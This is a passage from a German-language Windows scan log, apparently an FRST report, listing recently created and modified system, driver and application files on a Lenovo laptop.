2017-06-08 09:54 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrvext.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00086016 _____ C:\WINDOWS\system32\xboxgipsynthetic.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx 2017-06-08 09:54 - 2017-06-08 09:54 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx 2017-06-08 09:54 - 2017-06-08 09:54 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00059904 _____ C:\WINDOWS\SysWOW64\xboxgipsynthetic.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin 2017-06-08 09:54 - 2017-06-08 09:54 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00027136 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\Drivers\ksthunk.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmptrap.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rootmdm.sys 2017-06-08 09:51 - 2017-06-08 09:51 - 00008192 _____ C:\WINDOWS\system32\config\userdiff 2017-06-08 09:51 - 2017-06-08 08:58 - 00000000 ____D C:\WINDOWS\ServiceProfiles 2017-06-08 09:48 - 2017-06-08 09:48 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\SysWOW64\BestPractices 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\system32\msmq 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\system32\BestPractices 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files\Reference Assemblies 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files\MSBuild 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files (x86)\MSBuild 2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\inetpub 2017-06-08 09:48 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll 2017-06-08 09:48 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll 2017-06-08 09:48 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe 2017-06-08 09:48 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll 2017-06-08 09:48 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll 2017-06-08 09:48 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe 2017-06-08 09:17 - 2017-06-08 09:17 - 00000000 ____D C:\ProgramData\USOShared 2017-06-08 09:09 - 2017-06-08 09:09 - 00011433 _____ C:\WINDOWS\diagwrn.xml 2017-06-08 09:09 - 2017-06-08 09:09 - 00011433 _____ C:\WINDOWS\diagerr.xml 2017-06-08 09:08 - 2017-07-04 09:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-06-08 09:08 - 2017-06-08 09:08 - 00003760 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineUA 2017-06-08 09:08 - 2017-06-08 09:08 - 00003536 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineCore 2017-06-08 09:08 - 2017-06-08 09:08 - 00003482 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task 2017-06-08 09:08 - 2017-06-08 09:08 - 00003404 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier 2017-06-08 09:08 - 2017-06-08 09:08 - 00003118 _____ C:\WINDOWS\System32\Tasks\Intel PTT EK Recertification 2017-06-08 09:08 - 2017-06-08 09:08 - 00002340 _____ C:\WINDOWS\System32\Tasks\{D47AB256-778C-4756-BFF4-B5F38C8A441A} 2017-06-08 09:08 - 2017-06-08 09:08 - 00002336 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_LENOVO_MICPKEY 2017-06-08 09:08 - 2017-06-08 09:08 - 00002336 _____ C:\WINDOWS\System32\Tasks\{C33EC7F1-7E6C-4635-A9D8-DE9B48C4F5F2} 2017-06-08 09:08 - 2017-06-08 09:08 - 00002306 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_Dolby 2017-06-08 09:08 - 2017-06-08 09:08 - 00002280 _____ C:\WINDOWS\System32\Tasks\RTKCPL 2017-06-08 09:08 - 2017-06-08 09:08 - 00002274 _____ C:\WINDOWS\System32\Tasks\DolbySelectorTask 2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD 2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\Lenovo 2017-06-08 09:05 - 2017-06-08 09:05 - 00001519 _____ 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2017-06-08 09:01 - 2017-06-08 09:06 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate 2017-06-08 09:01 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines 2017-06-08 09:00 - 2017-07-04 21:38 - 02417936 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-06-08 09:00 - 2017-07-04 09:44 - 00000000 ____D C:\ProgramData\Synaptics 2017-06-08 09:00 - 2017-06-30 07:49 - 00000000 ____D C:\Users\ararat 2017-06-08 09:00 - 2017-06-08 09:07 - 00000000 ____D C:\Users\DefaultAppPool 2017-06-08 09:00 - 2017-06-08 09:00 - 02011386 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Vorlagen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Startmenü 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Netzwerkumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Lokale Einstellungen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Eigene Dateien 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Druckumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Videos 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Musik 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Bilder 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Verlauf 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 
00000000 _SHDL C:\Users\ararat\Vorlagen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Startmenü 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Netzwerkumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Lokale Einstellungen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Eigene Dateien 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Druckumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Videos 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Musik 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Bilder 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Verlauf 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WUDFUsbccidDriver_01_11_00.Wdf 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_wbf_vfs_lvcmn_01_11_00.Wdf 2017-06-08 09:00 - 2017-05-01 22:51 - 06437312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 02479552 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 01762752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00548800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00146880 _____ (NVIDIA Corporation) 
C:\WINDOWS\SysWOW64\oemdspif.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll 2017-06-08 09:00 - 2017-04-25 23:11 - 07944687 _____ C:\WINDOWS\system32\nvcoproc.bin 2017-06-08 08:59 - 2017-07-04 21:33 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2017-06-08 08:59 - 2017-07-04 09:44 - 00000000 ____D C:\ProgramData\NVIDIA 2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\ProgramData\NVIDIA Corporation 2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\NVIDIA Corporation 2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Intel 2017-06-08 08:59 - 2017-06-08 09:00 - 00000000 ____D C:\Program Files\Synaptics 2017-06-08 08:59 - 2017-06-08 08:59 - 00044875 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip 2017-06-08 08:59 - 2017-06-08 08:59 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_Smb_driver_Intel_01011.Wdf 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\ProgramData\DP45977C.lfl 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\system32\DAX2 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\Program Files\Realtek 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin 2017-06-08 08:59 - 2017-05-01 22:52 - 00001951 _____ C:\WINDOWS\NvContainerRecovery.bat 2017-06-08 08:59 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-06-08 08:59 - 2016-11-02 00:05 - 00099848 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2017-06-08 08:58 - 2017-07-04 09:44 - 04916088 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-06-08 08:58 - 2017-07-04 09:40 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-06-05 22:24 - 2017-06-12 21:54 - 00000000 ___DC C:\WINDOWS\Panther
2017-06-05 10:50 - 2017-06-05 10:50 - 00257864 _____ (Lenovo Group Limited) C:\WINDOWS\system32\iMDriverHelper.dll

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-07-04 21:38 - 2017-03-20 06:41 - 01067190 _____ C:\WINDOWS\system32\perfh007.dat
2017-07-04 21:38 - 2017-03-20 06:41 - 00247464 _____ C:\WINDOWS\system32\perfc007.dat
2017-07-04 21:38 - 2016-11-19 13:21 - 00136439 _____ C:\WINDOWS\system32\InstallUtil.InstallLog
2017-07-04 21:34 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-07-04 21:34 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-07-04 21:33 - 2016-02-11 22:02 - 00000000 __SHD C:\Users\ararat\IntelGraphicsProfiles
2017-07-04 09:43 - 2017-03-18 13:40 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-07-03 21:28 - 2016-03-27 18:17 - 00000000 ____D C:\Program Files\Common Files\Adobe
2017-07-03 21:28 - 2016-03-27 18:17 - 00000000 ____D C:\Program Files\Adobe
2017-07-03 21:28 - 2016-02-23 23:18 - 00000000 ____D C:\Program Files (x86)\Adobe
2017-07-03 21:28 - 2016-02-23 23:10 - 00000000 ____D C:\ProgramData\Adobe
2017-06-27 22:23 - 2016-02-23 22:19 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-06-27 21:00 - 2016-02-23 23:03 - 00000321 _____ C:\Users\ararat\Documents\BIMx_Export_Log.txt
2017-06-27 21:00 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Graphisoft
2017-06-27 20:26 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Documents\BIMx
2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D
C:\Users\ararat\AppData\Roaming\Spotify 2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Local\Spotify 2017-06-22 09:12 - 2016-02-23 22:22 - 00000000 ___RD C:\Users\ararat\Dropbox 2017-06-22 09:11 - 2016-10-25 19:04 - 00000000 ____D C:\Users\ararat\Documents\Tickets 2017-06-21 22:52 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF 2017-06-19 22:57 - 2016-02-23 22:19 - 00000000 ____D C:\Users\ararat\AppData\Local\Dropbox 2017-06-19 21:59 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache 2017-06-15 19:05 - 2016-02-12 20:16 - 00000000 __RHD C:\Users\Public\AccountPictures 2017-06-14 22:12 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe 2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser 2017-06-14 20:33 - 2016-02-11 21:55 - 00000000 ____D C:\WINDOWS\system32\MRT 2017-06-14 20:32 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp 2017-06-14 20:32 - 2016-02-11 21:55 - 133627792 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-06-14 20:22 - 2016-02-12 20:18 - 00002435 _____ C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2017-06-14 20:22 - 2016-02-12 20:18 - 00000000 ___RD C:\Users\ararat\OneDrive 2017-06-13 08:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat 2017-06-13 08:53 - 2016-02-12 20:16 - 00000000 ____D C:\Users\ararat\AppData\Local\Packages 2017-06-12 21:57 - 2016-09-17 15:35 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Skype 2017-06-12 21:54 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2017-06-08 09:58 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template 2017-06-08 09:54 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12 2017-06-08 
09:54 - 2017-03-18 23:03 - 00000000 ___RD C:\Program Files\Windows Defender 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2017-06-08 09:54 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism 2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI 2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\inetsrv 2017-06-08 09:48 - 2017-03-18 22:59 - 00611840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqutil.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqrt.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa30.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa20.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll 
2017-06-08 09:48 - 2017-03-18 22:59 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa10.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe 2017-06-08 09:48 - 2017-03-18 22:59 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe 2017-06-08 09:48 - 2017-03-18 22:59 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\cngkeyhelper.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cngkeyhelper.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00009096 _____ C:\WINDOWS\SysWOW64\msmqtrc.mof 2017-06-08 09:48 - 2017-03-18 22:56 - 01380352 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqqm.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsnap.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqutil.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqrt.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00177664 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\Drivers\mqac.sys 2017-06-08 09:48 - 2017-03-18 22:56 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqlogmgr.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa30.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa20.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqbkup.exe 2017-06-08 09:48 - 2017-03-18 22:56 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa10.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsvc.exe 2017-06-08 09:48 - 2017-03-18 22:56 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqcertui.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00009096 _____ C:\WINDOWS\system32\msmqtrc.mof 2017-06-08 09:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate 2017-06-08 09:13 - 2016-09-24 14:37 - 00000000 ____D C:\Program Files (x86)\SunplusIT Integrated Camera 2017-06-08 09:11 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT 2017-06-08 09:10 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2017-06-08 09:10 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM 2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration 2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-06-08 09:09 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2017-06-08 09:08 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell 2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media 2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries 2017-06-08 09:08 - 2016-02-12 19:33 - 00023056 _____ 
C:\WINDOWS\system32\emptyregdb.dat 2017-06-08 09:06 - 2017-05-18 08:30 - 00000000 ____D C:\WINDOWS\system32\UNP 2017-06-08 09:06 - 2017-05-01 17:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rhinoceros 5 2017-06-08 09:06 - 2016-07-14 22:45 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.2 2017-06-08 09:06 - 2016-07-09 22:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2017-06-08 09:06 - 2016-04-21 18:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk 3ds Max 2015 2017-06-08 09:06 - 2016-04-21 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk 2017-06-08 09:06 - 2016-03-23 19:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScummVM 2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WibuKey 2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeMeter 2017-06-08 09:06 - 2016-02-23 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GRAPHISOFT 2017-06-08 09:06 - 2016-02-23 22:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2017-06-08 09:06 - 2016-02-21 19:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client 2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-06-08 09:06 - 2016-02-13 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SRWare Iron (64-Bit) 2017-06-08 09:06 - 2016-02-12 20:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dolby 2017-06-08 09:06 - 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\SysWOW64\NV 2017-06-08 09:06 - 
